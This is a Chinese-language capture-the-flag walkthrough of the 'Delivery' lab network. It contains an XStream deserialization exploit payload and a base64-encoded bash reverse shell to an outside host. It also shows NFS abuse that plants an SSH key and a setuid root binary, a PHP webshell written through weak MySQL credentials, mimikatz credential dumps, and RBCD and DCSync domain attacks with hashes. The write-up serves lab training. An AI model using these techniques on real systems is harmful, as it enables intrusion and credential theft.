春秋云镜-Delivery

Delivery

flag1

信息收集

1
./fsacn -h 39.98.110.215
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
start infoscan
trying RunIcmp2
The current user permissions unable to send icmp packets
start ping
(icmp) Target 39.98.110.215 is alive
[*] Icmp alive hosts len is: 1
39.98.110.215:80 open
39.98.110.215:8080 open
39.98.110.215:21 open
39.98.110.215:22 open
[*] alive ports len is: 4
start vulscan
[*] WebTitle: http://39.98.110.215 code:200 len:10918 title:Apache2 Ubuntu Default Page: It works
[+] ftp://39.98.110.215:21:anonymous
[->]1.txt
[->]pom.xml
[*] WebTitle: http://39.98.110.215:8080 code:200 len:3655 title:公司发货单

外网打点

FTP

有个ftp

1
ftp://39.98.110.215:21:anonymous 

匿名登录

1.txt没东西

查看pom.xml

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
<?xml version="1.0" encoding="UTF-8"?>
<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 https://maven.apache.org/xsd/maven-4.0.0.xsd">
<modelVersion>4.0.0</modelVersion>
<parent>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-parent</artifactId>
<version>2.7.2</version>
<relativePath/> <!-- lookup parent from repository -->
</parent>
<groupId>com.example</groupId>
<artifactId>ezjava</artifactId>
<version>0.0.1-SNAPSHOT</version>
<name>ezjava</name>
<description>ezjava</description>
<properties>
<java.version>1.8</java.version>
</properties>
<dependencies>
<dependency>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-thymeleaf</artifactId>
</dependency>
<dependency>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-web</artifactId>
</dependency>

<dependency>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-test</artifactId>
<scope>test</scope>
</dependency>

<dependency>
<groupId>com.thoughtworks.xstream</groupId>
<artifactId>xstream</artifactId>
<version>1.4.16</version>
</dependency>

<dependency>
<groupId>commons-collections</groupId>
<artifactId>commons-collections</artifactId>
<version>3.2.1</version>
</dependency>
</dependencies>

<build>
<plugins>
<plugin>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-maven-plugin</artifactId>
</plugin>
</plugins>
</build>

</project>

1.4.16的xstream

xstream

直接打XStream 反序列化命令执行漏洞(CVE-2021-29505)

1
java -cp ysoserial-all.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections6 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC82Mi4yMzQuODIuMTExLzk5OTkgMD4mMQ==}|{base64,-d}|{bash,-i}"
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
POST /just_sumbit_it HTTP/1.1
Host: 39.98.110.215:8080
Content-Length: 3115
X-Requested-With: XMLHttpRequest
Accept-Language: zh-CN,zh;q=0.9
Accept: application/xml, text/xml, */*; q=0.01
Content-Type: application/xml;charset=UTF-8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.6723.70 Safari/537.36
Origin: http://39.98.110.215:8080
Referer: http://39.98.110.215:8080/
Accept-Encoding: gzip, deflate, br
Connection: keep-alive

<java.util.PriorityQueue serialization='custom'>
<unserializable-parents/>
<java.util.PriorityQueue>
<default>
<size>2</size>
</default>
<int>3</int>
<javax.naming.ldap.Rdn_-RdnEntry>
<type>12345</type>
<value class='com.sun.org.apache.xpath.internal.objects.XString'>
<m__obj class='string'>com.sun.xml.internal.ws.api.message.Packet@2002fc1d Content</m__obj>
</value>
</javax.naming.ldap.Rdn_-RdnEntry>
<javax.naming.ldap.Rdn_-RdnEntry>
<type>12345</type>
<value class='com.sun.xml.internal.ws.api.message.Packet' serialization='custom'>
<message class='com.sun.xml.internal.ws.message.saaj.SAAJMessage'>
<parsedMessage>true</parsedMessage>
<soapVersion>SOAP_11</soapVersion>
<bodyParts/>
<sm class='com.sun.xml.internal.messaging.saaj.soap.ver1_1.Message1_1Impl'>
<attachmentsInitialized>false</attachmentsInitialized>
<nullIter class='com.sun.org.apache.xml.internal.security.keys.storage.implementations.KeyStoreResolver$KeyStoreIterator'>
<aliases class='com.sun.jndi.toolkit.dir.LazySearchEnumerationImpl'>
<candidates class='com.sun.jndi.rmi.registry.BindingEnumeration'>
<names>
<string>aa</string>
<string>aa</string>
</names>
<ctx>
<environment/>
<registry class='sun.rmi.registry.RegistryImpl_Stub' serialization='custom'>
<java.rmi.server.RemoteObject>
<string>UnicastRef</string>
<string>62.234.82.111</string>
<int>1099</int>
<long>0</long>
<int>0</int>
<long>0</long>
<short>0</short>
<boolean>false</boolean>
</java.rmi.server.RemoteObject>
</registry>
<host>62.234.82.111</host>
<port>1099</port>
</ctx>
</candidates>
</aliases>
</nullIter>
</sm>
</message>
</value>
</javax.naming.ldap.Rdn_-RdnEntry>
</java.util.PriorityQueue>
</java.util.PriorityQueue>

flag2&3

上传 fscan 和 Stowaway(比frp好用)

记录一下stowaway用法

  • 单层

    • vps :./linux_x64_admin -l port -s 123 # 123是key,自定义即可

    • 靶机:./linux_x64_agent -c vps_ip:port -s 123 –reconnect 8 # 8秒后重连,不加也可以

    • 靶机执行后在vps上执行use 0,然后socks PORT

    • socks代理就是 vps_ip PORT

  • 多层

    假设存在靶机1,2 靶机2存在双网卡(多网卡),靶机1存在外网服务,靶机1和靶机2的网卡A在同一内网,和另一个网卡B不通,目的:访问网卡B的服务

    • 先搭建vps到靶机1的单层代理,参考单层
    • 假设单层代理use 0,在use 0 中 listen,然后选择1,选择监听9999端口。相当于在靶机1上监听9999端口
    • 在靶机2上运行./linux_x64_agent -c 靶机1ip:9999-s 123 –reconnect 8
    • 在vps上显示连接成功后 use 1,然后socks port,这就是新的socks代理
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
start infoscan
(icmp) Target 172.22.13.14 is alive
(icmp) Target 172.22.13.6 is alive
(icmp) Target 172.22.13.28 is alive
(icmp) Target 172.22.13.57 is alive
[*] Icmp alive hosts len is: 4
172.22.13.28:80 open
172.22.13.57:80 open
172.22.13.57:22 open
172.22.13.14:80 open
172.22.13.14:22 open
172.22.13.14:21 open
172.22.13.6:445 open
172.22.13.6:139 open
172.22.13.28:445 open
172.22.13.28:139 open
172.22.13.6:135 open
172.22.13.28:135 open
172.22.13.14:8080 open
172.22.13.28:8000 open
172.22.13.28:3306 open
172.22.13.6:88 open
[*] alive ports len is: 16
start vulscan
[*] NetInfo:
[*]172.22.13.28
[->]WIN-HAUWOLAO
[->]172.22.13.28
[*] NetInfo:
[*]172.22.13.6
[->]WIN-DC
[->]172.22.13.6
[*] WebTitle: http://172.22.13.14 code:200 len:10918 title:Apache2 Ubuntu Default Page: It works
[*] NetBios: 172.22.13.6 [+]DC XIAORANG\WIN-DC
[*] WebTitle: http://172.22.13.28 code:200 len:2525 title:欢迎登录OA办公平台
[*] NetBios: 172.22.13.28 WIN-HAUWOLAO.xiaorang.lab Windows Server 2016 Datacenter 14393
[*] WebTitle: http://172.22.13.57 code:200 len:4833 title:Welcome to CentOS
[*] WebTitle: http://172.22.13.28:8000 code:200 len:170 title:Nothing Here.
[+] ftp://172.22.13.14:21:anonymous
[->]1.txt
[->]pom.xml
[*] WebTitle: http://172.22.13.14:8080 code:200 len:3655 title:公司发货单
[+] mysql:172.22.13.28:3306:root 123456

目标

172.22.13.14 入口机

172.22.13.6 DC 域控

172.22.13.28 mysql

172.22.13.57 centos

172.22.13.57

NFS

1
2
3
4
5
6
7
8
9
10
11
12
wget http://archive.ubuntu.com/ubuntu/pool/main/n/nfs-utils/nfs-common_1.3.4-2.5ubuntu3_amd64.deb
wget http://archive.ubuntu.com/ubuntu/pool/main/libn/libnfsidmap/libnfsidmap2_0.25-5.1ubuntu1_amd64.deb
wget http://archive.ubuntu.com/ubuntu/pool/main/libt/libtirpc/libtirpc3_1.2.5-1_amd64.deb
wget http://archive.ubuntu.com/ubuntu/pool/main/r/rpcbind/rpcbind_1.2.5-8_amd64.deb
wget http://archive.ubuntu.com/ubuntu/pool/main/k/keyutils/keyutils_1.6-6ubuntu1_amd64.deb
wget http://archive.ubuntu.com/ubuntu/pool/main/libt/libtirpc/libtirpc-common_1.2.5-1_all.deb
sudo dpkg -i libnfsidmap2_0.25-5.1ubuntu1_amd64.deb && \
sudo dpkg -i libtirpc-common_1.2.5-1_all.deb && \
sudo dpkg -i libtirpc3_1.2.5-1_amd64.deb && \
sudo dpkg -i rpcbind_1.2.5-8_amd64.deb && \
sudo dpkg -i keyutils_1.6-6ubuntu1_amd64.deb && \
sudo dpkg -i nfs-common_1.3.4-2.5ubuntu3_amd64.deb
1
2
3
cd /
mkdir temp
mount -t nfs 172.22.13.57:/ ./temp -o nolock

1
2
3
4
5
6
7
8
ssh-keygen -t rsa -b 4096
cd /temp/home/joyce/
mkdir .ssh
cat /cg.pub >> /temp/home/joyce/.ssh/authorized_keys
# 写一个恶意root 到/temp/home/joyce中
echo 'int main() { setgid(0); setuid(0); system("/bin/bash"); return 0; }' > root.c
gcc root.c -o root
chmod +s root

SSH连接

1
2
3
./root # 即可提权到root
python3 -c 'import pty;pty.spawn("/bin/bash")'
ssh -i /root/.ssh/id_rsa joyce@172.22.13.57

另一个种读flag方式

1
find / -user root -perm -4000 -exec ls -ldb {} \;	

有个ftp,但是没权限上传到一开始的ftp上

手动起一个(这里不要在新建的temp目录中 没权限写)

1
python3 -m pyftpdlib -p 6666 -u test -P test -w &

172.22.13.28

mysql:172.22.13.28:3306:root 123456

172.22.13.28是个mysql弱口令,起一下全局代理用navicat连上去

看了一下secure_file_priv,发现是空的,所以能写马上去

1
show variables like "secure_file_priv";

日志

1
show variables like "%general%"

写个马

1
select "<?php eval($_POST[1]);?>" into outfile "C:/phpstudy_pro/WWW/1.php";

蚁剑连

flag4

172.22.13.6

开始rdp,phpstudy起的服务基本上都是管理员权限

1
2
net user dog qwer1234! /add
net localgroup administrators dog /add

用BloodHound发现chenglei这个用户是ACL Admins组,对WIN-DC具有WriteDacl权限,可以打rbcd 或者 dcsync

抓一下hash

直接管理员cmd运行,查看test.txt即可

1
mimikatz.exe "privilege::debug" "log" "sekurlsa::logonpasswords" "exit" > test.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
Authentication Id : 0 ; 211625 (00000000:00033aa9)
Session : Service from 0
User Name : chenglei
Domain : XIAORANG
Logon Server : WIN-DC
Logon Time : 2025/3/22 17:36:54
SID : S-1-5-21-3269458654-3569381900-10559451-1105
msv :
[00000003] Primary
* Username : chenglei
* Domain : XIAORANG
* NTLM : 0c00801c30594a1b8eaa889d237c5382
* SHA1 : e8848f8a454e08957ec9814b9709129b7101fad7
* DPAPI : 89b179dc738db098372c365602b7b0f4
tspkg :
wdigest :
* Username : chenglei
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : chenglei
* Domain : XIAORANG.LAB
* Password : Xt61f3LBhg1
ssp :
credman :

Username : chenglei

Domain : XIAORANG.LAB

NTLM : 0c00801c30594a1b8eaa889d237c5382

Password : Xt61f3LBhg1

打rbcd

未成功 应该是机器时间问题

1
proxychains python3 addcomputer.py xiaorang.lab/chenglei:'Xt61f3LBhg1' -dc-ip 172.22.13.6 -dc-host xiaorang.lab -computer-name 'TEST$' -computer-pass 'P@ssw0rd'
1
proxychains python3 rbcd.py xiaorang.lab/chenglei:'Xt61f3LBhg1' -dc-ip 172.22.13.6 -action write -delegate-to 'WIN-DC$' -delegate-from 'TEST$'
1
proxychains python3 getST.py xiaorang.lab/'TEST$':'P@ssw0rd' -spn cifs/WIN-DC.xiaorang.lab -impersonate Administrator -dc-ip 172.22.13.6
1
export KRB5CCNAME=Administrator@cifs_WIN-DC.xiaorang.lab@XIAORANG.LAB.ccache

然后改/etc/hosts把dc加进去,即可无密码连上去

1
proxychains python3 psexec.py Administrator@WIN-DC.xiaorang.lab -k -no-pass -dc-ip 172.22.13.6

上述未成功 尝试如下 未成功

1
proxychains python3 psexec.py Administrator@172.22.13.6 -k -no-pass -dc-ip 172.22.13.6

打DCSync

1
proxychains4 python dacledit.py xiaorang.lab/chenglei -hashes :0c00801c30594a1b8eaa889d237c5382 -action write -rights DCSync -principal chenglei -target-dn "DC=xiaorang,DC=lab" -dc-ip 172.22.13.6

读hash

1
proxychains4 python3 secretsdump.py xiaorang.lab/chenglei:Xt61f3LBhg1@172.22.13.6 -just-dc

Administrator:500:aad3b435b51404eeaad3b435b51404ee:6341235defdaed66fb7b682665752c9a:::

1
proxychains crackmapexec smb 172.22.13.6 -u administrator -H6341235defdaed66fb7b682665752c9a -d xiaorang.lab -x "type Users\Administrator\flag\flag04.txt"